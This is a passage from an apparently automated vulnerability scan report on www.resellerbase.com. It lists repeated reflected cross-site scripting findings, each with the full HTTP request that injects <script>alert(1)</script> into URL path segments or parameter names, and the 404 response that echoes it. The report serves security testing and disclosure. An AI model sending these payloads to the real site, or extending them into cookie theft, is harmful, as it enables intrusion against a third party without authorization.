The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 63037<script>alert(1)</script>c9b55262a19 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/2063037<script>alert(1)</script>c9b55262a19/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/2063037<script>alert(1)</script>c9b55262a19/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.1676. http://www.resellerbase.com/detail/20/themes/kosmos/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2b087<script>alert(1)</script>86f1c9a04dd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes2b087<script>alert(1)</script>86f1c9a04dd/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes2b087<script>alert(1)</script>86f1c9a04dd/kosmos/ was not found on this server.</p>
...[SNIP]...

2.1677. http://www.resellerbase.com/detail/20/themes/kosmos/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1e8f5<script>alert(1)</script>42ee98ece06 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes/kosmos1e8f5<script>alert(1)</script>42ee98ece06/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos1e8f5<script>alert(1)</script>42ee98ece06/ was not found on this server.</p>
...[SNIP]...

2.1678. http://www.resellerbase.com/detail/20/themes/kosmos/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 27932<script>alert(1)</script>9e65be949c7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes/kosmos/?27932<script>alert(1)</script>9e65be949c7=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos/?27932<script>alert(1)</script>9e65be949c7=1 was not found on this server.</p>
...[SNIP]...

2.1679. http://www.resellerbase.com/detail/20/themes/kosmos/images/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8ec56<script>alert(1)</script>0f893cd557f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail8ec56<script>alert(1)</script>0f893cd557f/20/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail8ec56<script>alert(1)</script>0f893cd557f/20/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1680. http://www.resellerbase.com/detail/20/themes/kosmos/images/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 54097<script>alert(1)</script>e184974ad6a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/2054097<script>alert(1)</script>e184974ad6a/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/2054097<script>alert(1)</script>e184974ad6a/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1681. http://www.resellerbase.com/detail/20/themes/kosmos/images/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a0531<script>alert(1)</script>16b8a41824b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themesa0531<script>alert(1)</script>16b8a41824b/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themesa0531<script>alert(1)</script>16b8a41824b/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1682. http://www.resellerbase.com/detail/20/themes/kosmos/images/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f1328<script>alert(1)</script>d3464658724 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes/kosmosf1328<script>alert(1)</script>d3464658724/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmosf1328<script>alert(1)</script>d3464658724/images/ was not found on this server.</p>
...[SNIP]...

2.1683. http://www.resellerbase.com/detail/20/themes/kosmos/images/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 337dd<script>alert(1)</script>6b16fd3eb3b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes/kosmos/images337dd<script>alert(1)</script>6b16fd3eb3b/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos/images337dd<script>alert(1)</script>6b16fd3eb3b/ was not found on this server.</p>
...[SNIP]...

2.1684. http://www.resellerbase.com/detail/20/themes/kosmos/images/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload df51a<script>alert(1)</script>66a0f4d074f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes/kosmos/images/?df51a<script>alert(1)</script>66a0f4d074f=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos/images/?df51a<script>alert(1)</script>66a0f4d074f=1 was not found on this server.</p>
...[SNIP]...

2.1685. http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9cf91<script>alert(1)</script>6ecf6760bb7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail9cf91<script>alert(1)</script>6ecf6760bb7/20/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail9cf91<script>alert(1)</script>6ecf6760bb7/20/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1686. http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 27eda<script>alert(1)</script>a546fc18636 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/2027eda<script>alert(1)</script>a546fc18636/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/2027eda<script>alert(1)</script>a546fc18636/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1687. http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 40f39<script>alert(1)</script>859c4493e18 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes40f39<script>alert(1)</script>859c4493e18/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes40f39<script>alert(1)</script>859c4493e18/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1688. http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 515b0<script>alert(1)</script>d4071a41967 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes/kosmos515b0<script>alert(1)</script>d4071a41967/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos515b0<script>alert(1)</script>d4071a41967/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1689. http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload abffa<script>alert(1)</script>82e9556817c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes/kosmos/imagesabffa<script>alert(1)</script>82e9556817c/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos/imagesabffa<script>alert(1)</script>82e9556817c/rating/ was not found on this server.</p>
...[SNIP]...

2.1690. http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload f6bbd<script>alert(1)</script>eef24b82a02 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes/kosmos/images/ratingf6bbd<script>alert(1)</script>eef24b82a02/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos/images/ratingf6bbd<script>alert(1)</script>eef24b82a02/ was not found on this server.</p>
...[SNIP]...

2.1691. http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a6124<script>alert(1)</script>ab483c4937 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes/kosmos/images/rating/?a6124<script>alert(1)</script>ab483c4937=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos/images/rating/?a6124<script>alert(1)</script>ab483c4937=1 was not found on this server.</p>
...[SNIP]...

2.1692. http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/5.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 51189<script>alert(1)</script>6076a6cdbd2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail51189<script>alert(1)</script>6076a6cdbd2/20/themes/kosmos/images/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:28:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail51189<script>alert(1)</script>6076a6cdbd2/20/themes/kosmos/images/rating/5.gif was not found on this server.</p>
...[SNIP]...

2.1693. http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/5.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e30db<script>alert(1)</script>fd0a187a4e1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20e30db<script>alert(1)</script>fd0a187a4e1/themes/kosmos/images/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:28:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20e30db<script>alert(1)</script>fd0a187a4e1/themes/kosmos/images/rating/5.gif was not found on this server.</p>
...[SNIP]...

2.1694. http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/5.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 44c0f<script>alert(1)</script>69bd448ba0c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes44c0f<script>alert(1)</script>69bd448ba0c/kosmos/images/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:29:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
